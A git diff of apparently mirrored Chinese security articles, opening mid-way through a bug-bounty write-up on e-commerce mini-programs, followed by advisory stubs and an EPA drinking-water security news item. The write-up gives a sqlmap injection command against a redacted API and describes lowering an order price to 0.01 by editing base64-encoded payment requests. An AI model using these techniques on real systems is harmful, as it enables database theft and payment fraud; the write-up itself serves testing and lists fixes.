其它增删查同理,也是抓取到相应的API即可完成 + +**4. 数据交互接口存在SQL注入** +``` +sqlmap -u “xxx.com/api/xxx/xxx/key=1&uid=xxx” --batch --dbs +``` + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNzovfYchLkQyr9A3gWMsuPkWpCFqKb7zgIpoTMWNLGiakzZzy7ejg2G3ApdxwhK3lhlqicCgSVibL5w/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +**** +     +最后我们整理一下修复建议: +``` +1. +  首先关于登录页面可暴力破解,建议对相关账号、IP等进行风控验证 +  对相关的账号与密码value进行前端加密 +2. +  关于越权造成的信息泄露,建议以用户token进行鉴权 +  比如jwt、token等格式,给一个x分钟不操作退出账号等机制 +  其次可以给每个操作数据包加入sign,防止重放攻击 +3. +  关于越权造成的增删改查,建议首先从账号进行判断,先解决越权漏洞问题 +  其次就是前端需要进行鉴别数据的真实性和危害性,哪怕是用正则表达式的方法 +4. +  关于uid存在的SQL注入,因为前端传入参数需要拿uid去数据库查询的 +  使用的是MSSQL数据库,判断大概SQL语句如下 +  select * from user_tables where uid=$uid; +  未进行任何过滤,被带入数据库造成的SQL注入 +  建议使用预编译的方式进行SQL语句查询,最好有黑名单字典,比如敏感关键字等 +``` + +**P4. 小程序-某电子商城小程序漏洞** + +    一般情况下小程序是我们在挖掘企业漏洞时,在搜集资产的一部分,很少有专门去挖掘小程序漏洞的,因为小程序漏洞并不是很多,普遍的如下 +``` +1. 文件上传处-可能存在的任意文件上传漏洞 +2. 数据交互处可能存在的SQL注入 +3. 账户可能存在越权漏洞 +4. 登录接口存在KEY、IV等泄露造成的逆向越权 +5. 支付漏洞:0元购、替换订单号、替换支付单号等 +6. 通过反编译中前端源代码泄露的OSS及其它信息(现在不多了) +7. 通过小程序抓包引起的API地址泄露及未授权访问 +``` + +    大概总的方向就这些(我遇到的漏洞就这些,当然也可能会有其它漏洞姿势)**** + +    这个是之前遇到的一个商城小程序漏洞,出现的支付漏洞,除了支付功能及接口在WEB站点没有,其它功能一样,除此之外,不同的是,小程序所有请求/响应包内容都被base64编码了 +``` +域名: target.custerm.com 开通会员功能,会员有专享福利 +``` + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BO5ibWgugbI7TRnQbQZ1sXKOTyk027pycuYQGu38zGTRJNA3GqorhzARw/640?wx_fmt=png&from=appmsg "") + +    选好套餐以后,价格是四万九左右吧,对base64进行解码,把所有关于价格value改为0.01元,放包即可 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMQpRS8zV6Nib7zHFib3iayYsIKIUGcJyWv2iaxb89ks0icIjt7HsicSy7tW6CrFeur4VdooWgqRzWXR5dg/640?wx_fmt=png&from=appmsg&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1 "") + +    当然,因为现在系统第二天或者晚上都有财务核算,后面给自动退款了,现在漏洞已经修复了 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BObCou2MHGg3aWacr0z6Mf0SvYPduaKol6VHgpjgia1c8IXFG7AUH7asw/640?wx_fmt=png&from=appmsg "") + +**0x03 总结** + +**关于电子商城类的漏洞,在漏洞挖掘时主要侧重如下方面** +``` +对于代码审计-白盒 + 白盒审计还是侧重owasp类型的漏洞,传统8大漏洞+API测试等,这个不用多说 +侧重说黑盒测试 + 首先,我们知道它是商城系统,肯定以支付和商品为主 + 所以在挖掘时,先去看有无支付漏洞、关于支付漏洞大家可以去多看文章 + 其次就是有商品肯定有商家,关注是否存在商家信息泄露、越权的情况 + 有商家肯定有商家系统后台,搜集信息能否进入商家系统后台或系统存在的漏洞 + 有商家肯定有用户,看能不能达到越权漏洞:越权登录、越权信息泄露、订单号泄露、越权支付、XSS等 + 商城系统主要功能是什么:是卖货,这个时候多注意SQL注入和文件上传的漏洞 +会出现在哪些地方? +    多注意支付接口,登录接口,商品接口,个人头像,商品图片上传等等一些在前端容易发现和容易测试的地方 +    相对于其它漏洞,这两个还是比较容易挖的 + 在用户方面,多注意爆破、短信类型漏洞、注册登录类漏洞 + 现在大部分站点都使用vue+框架去建站了,多关注API类型漏洞,常出现swagger、springboot类等 +``` + + +建立了一个 +src专项圈子 +,内容包含**src漏洞知识库** +、**src挖掘技巧** +、**src视频教程** +等,一起学习赚赏金技巧,以及专属微信群一起挖洞 + +圈子专注于更新src相关: + +``` +1、维护更新src专项漏洞知识库,包含原理、挖掘技巧、实战案例 +2、分享src优质视频课程 +3、分享src挖掘技巧tips +4、小群一起挖洞 +``` + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOABrvjQvw6cnCXlwS05xyzHjx9JgU7j83aReoqqUbdpiaMX2HeudxqYg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOXg868PqXyjsACp9LhuEeyfB2kTZVOt5Pz48txg7ueRUvDdeefTNKdg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/h8P1KUHOKuYgNUapJqQxicbYTJoohoBK32iat5p76xlsgd6bdhZsdAgtNzPEv9CEOh96qgHK3ibHHBa4kRibjQeuibw/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + + +图片 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuYrUoo5XZpxN9Inq87ic71D6aUeMdaWrKXgYYia2On8nMA7bqWDySa8odAq1a0kkp3WFgf0Zp0Eut0A/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/h8P1KUHOKuZDDDv3NsbJDuSicLzBbwVDCPFgbmiaJ4ibf4LRgafQDdYodOgakdpbU1H6XfFQCL81VTudGBv2WniaDA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "null") + +图片 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKub5zKpgA0HmT6klBJg9IugIx3z6YtXqmOkmp18nLD3bpyy8w4daHlAWQn4HiauibfBAk0mrh2qNlY8A/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + + +图片 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKub5zKpgA0HmT6klBJg9IugI5tZcaxhZn1icWvbgupXzkwybR5pCzxge4SKxSM5z4s9kwOmvuI3cIkQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +图片 +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOHgjJxnq1ibibJgVUx3LwCjZj62vygx8w6rxia1icmIWiax2YlP6S6LmlmlQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOApVm8H605qOibxia5DqPHfbWD6lmcweDjGv4DLl45waD068ugw2Iv2vg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOwldaSATYOh1WQpk1qz15rLxehOAn4aK7tdbSyNEuHDZpIISCtl6Q8w/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKub5zKpgA0HmT6klBJg9IugIstia27YLJFBtC5icJO6gHLLgzRDqib6upI3BsVFfLL02w6Q8jIRRp0NJA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuYrUoo5XZpxN9Inq87ic71D6JWUFIwPbP7Au1PYLXTplb3bbFZFlaYDtXXTqPdzOO6iaFz8F7r8WUPw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + + diff --git a/doc/漏洞预警|Apache OFBiz远程代码执行漏洞(CVE-2024-47208).md b/doc/漏洞预警|Apache OFBiz远程代码执行漏洞(CVE-2024-47208).md new file mode 100644 index 00000000..df15b614 --- /dev/null +++ b/doc/漏洞预警|Apache OFBiz远程代码执行漏洞(CVE-2024-47208).md @@ -0,0 +1,6 @@ +# 漏洞预警|Apache OFBiz远程代码执行漏洞(CVE-2024-47208) +威胁情报运营中心 矢安科技 2024-11-19 12:26 + +![](https://mmbiz.qpic.cn/mmbiz_png/U9q5QO5nvTS87BRxLicQDNdbt3kDF0PfMHFq2c2XIvdBC0PiavJvx5l3j6NQtJmUnlrf2LveMRadTfDk8O9dialXg/640?wx_fmt=png&from=appmsg "") + + diff --git a/doc/漏洞预警|Palo Alto Networks PAN-OSS身份验证绕过等多个漏洞.md b/doc/漏洞预警|Palo Alto Networks PAN-OSS身份验证绕过等多个漏洞.md new file mode 100644 index 00000000..51232e96 --- /dev/null +++ b/doc/漏洞预警|Palo Alto Networks PAN-OSS身份验证绕过等多个漏洞.md @@ -0,0 +1,6 @@ +# 漏洞预警|Palo Alto Networks PAN-OSS身份验证绕过等多个漏洞 +威胁情报运营中心 矢安科技 2024-11-19 12:26 + +![](https://mmbiz.qpic.cn/mmbiz_png/U9q5QO5nvTS87BRxLicQDNdbt3kDF0PfM2jBhNFX0DkjfHoian2XshmicM2LqxuJYNNqiamuE2CZ1rH1L8PfljIuXw/640?wx_fmt=png&from=appmsg "") + + diff --git a/doc/美国饮用水系统存在300多个漏洞,影响1.1亿人.md b/doc/美国饮用水系统存在300多个漏洞,影响1.1亿人.md index 9484323e..25370b81 100644 --- a/doc/美国饮用水系统存在300多个漏洞,影响1.1亿人.md +++ b/doc/美国饮用水系统存在300多个漏洞,影响1.1亿人.md @@ -1,10 +1,5 @@ # 美国饮用水系统存在300多个漏洞,影响1.1亿人 -老布 FreeBuf 2024-11-19 11:35 - -![](https://mmbiz.qpic.cn/mmbiz_gif/oQ6bDiaGhdyoFWEgZIHic7sqnootFEuOic7RlQNGhKY6d2ZESG3WpiaTMRlD0z4xO6mQrTZjkWHCkMpO2QtCfUJH6g/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "") - - -![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR39uD8TzUAG6icPT99CvicxqoB0SwP2rAwZBuHBDcNNve8Pib49F7P26PogYNP8jclKbvmS6AhXyicVZ9A/640?wx_fmt=jpeg&from=appmsg "") +FreeBuf 商密君 2024-11-19 14:31 > 美国环境保护署(EPA)标记了300多个饮用水系统的安全漏洞,这些系统为大约1.1亿人提供服务。 @@ -13,7 +8,7 @@ 近日,美国环境保护署(EPA)监察长办公室(OIG)发布了一份研究报告,在对美国1062个饮用水系统进行了安全性缺陷评估活动之后,结果显示,超过300个饮用水系统存在系统漏洞,存在可能导致功能丧失、无法服务和用户信息泄露的风险。不安全的饮用水系统为1.1亿美国人提供服务。 -![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR39uD8TzUAG6icPT99CvicxqoBse5fFY24qpe6vJID3aqMLWbN5d0nubADskMPU9b5xzxIakSap6BYOw/640?wx_fmt=jpeg&from=appmsg "") +![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR39uD8TzUAG6icPT99CvicxqoBse5fFY24qpe6vJID3aqMLWbN5d0nubADskMPU9b5xzxIakSap6BYOw/640?wx_fmt=jpeg&from=appmsg&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1 "") 安全性缺陷评估涵盖了五个网络安全类别,即电子邮件安全、IT卫生、漏洞、对抗性威胁和恶意活动,并根据潜在影响对识别的漏洞从低到高进行评分。 @@ -49,57 +44,35 @@ EPA还会为每个被调查对象绘制系统的数字足迹,涵盖用于收 EPA也与美国网络安全和基础设施安全局(CISA)及美国联邦调查局(FBI)联合发布了一项网络安全实践指南,旨在帮助城市供水和废水处理领域的企业组织提高网络安全弹性和事件响应能力。 +编辑:陈十九 -【 -FreeBuf粉丝交流群招新啦! +审核:商密君 -在这里,拓宽网安边界 +**征文启事** -甲方安全建设干货; - -乙方最新技术理念; - -全球最新的网络安全资讯; - -群内不定期开启各种抽奖活动; - -FreeBuf盲盒、大象公仔...... - -扫码添加小蜜蜂微信回复「加群」,申请加入群聊 -】 - -![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR3ich6ibqlfxbwaJlDyErKpzvETedBHPS9tGHfSKMCEZcuGq1U1mylY7pCEvJD9w60pWp7NzDjmM2BlQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "") +大家好,为了更好地促进同业间学术交流,商密君现开启征文活动,只要你对商用密码、网络安全、数据加密等有自己的独到见解和想法,都可以积极向商密君投稿,商密君一定将您的声音传递给更多的人。 -![](https://mmbiz.qpic.cn/mmbiz_png/oQ6bDiaGhdyodyXHMOVT6w8DobNKYuiaE7OzFMbpar0icHmzxjMvI2ACxFql4Wbu2CfOZeadq1WicJbib6FqTyxEx6Q/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") +![](https://mmbiz.qpic.cn/mmbiz_jpg/1HyKzSU2XXNcXmbiaiaCljdXpwzOEQ9QTBXMibM6rZTOnbTSwTmCXncQLria2vuLGxn8QPtznzBc0as8vBxWIjrWxQ/640?wx_fmt=jpeg "") -![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ61icYlLmBLDpdYEZ7nIzpGovpHjtxITB6ibiaC3R5hoibVkQsVLQfdK57w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "") -> https://www.securityweek.com/300-drinking-water-systems-in-us-exposed-to-disruptive-damaging-hacker-attacks/ +来源:FreeBuf + +注:内容均来源于互联网,版权归作者所有,如有侵权,请联系告知,我们将尽快处理。 + +![](https://mmbiz.qpic.cn/mmbiz_jpg/1HyKzSU2XXOdeQx0thlyozF2swQTEN9iaaBNDG0jTKfAgqgdesve8x5IEWNvYxjF6sAWjO1TPCZVsWd0oiaDn3uw/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1 "") -> -> -> -> -> -> -> -> -> -> -> -> -> -> +![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMyyClGk1cttkSBbJicAn5drpXEbFIeChG9IkrslYEylRF4Z6KNaxNafDwr5ibcYaZXdnveQCNIr5kw/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1 "") +![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMZPiaDBD8yxbIHiciauWK4tuiaMcJkA69QYZ9T4jmc3fdN6EA7Qq9A8E3RWcTKhxVEU1QjqOgrJMu2Qg/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1 "") -![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ7JfyOicficFrgrD4BHnIMtgCpBbsSUBsQ0N7pHC7YpU8BrZWWwMMghoQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") +点分享 -[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302087&idx=1&sn=29d91904d6471c4b09f4e574ba18a9b2&chksm=bd1c3a4c8a6bb35aa4ddffc0f3e2e6dad475257be18f96f5150c4e948b492f32b1911a6ea435&token=21436342&lang=zh_CN&scene=21#wechat_redirect) +![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMZPiaDBD8yxbIHiciauWK4tuiaiaRXdw4BFsc7MxzkVZaKGgtjWA5GKtUfm3hlgzsBtjJ0mnh9QibeFOGQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1 "") -[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302006&idx=1&sn=18f06c456804659378cf23a5c474e775&scene=21#wechat_redirect) +点点赞 -[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651253272&idx=1&sn=82468d927062b7427e3ca8a912cb2dc7&scene=21#wechat_redirect) +![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMZPiaDBD8yxbIHiciauWK4tuiaeiaNlRO9954g4VS87icD7KQdxzokTGDIjmCJA563IwfStoFzPUaliauXg/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1 "") -![](https://mmbiz.qpic.cn/mmbiz_gif/qq5rfBadR3icF8RMnJbsqatMibR6OicVrUDaz0fyxNtBDpPlLfibJZILzHQcwaKkb4ia57xAShIJfQ54HjOG1oPXBew/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "") +点在看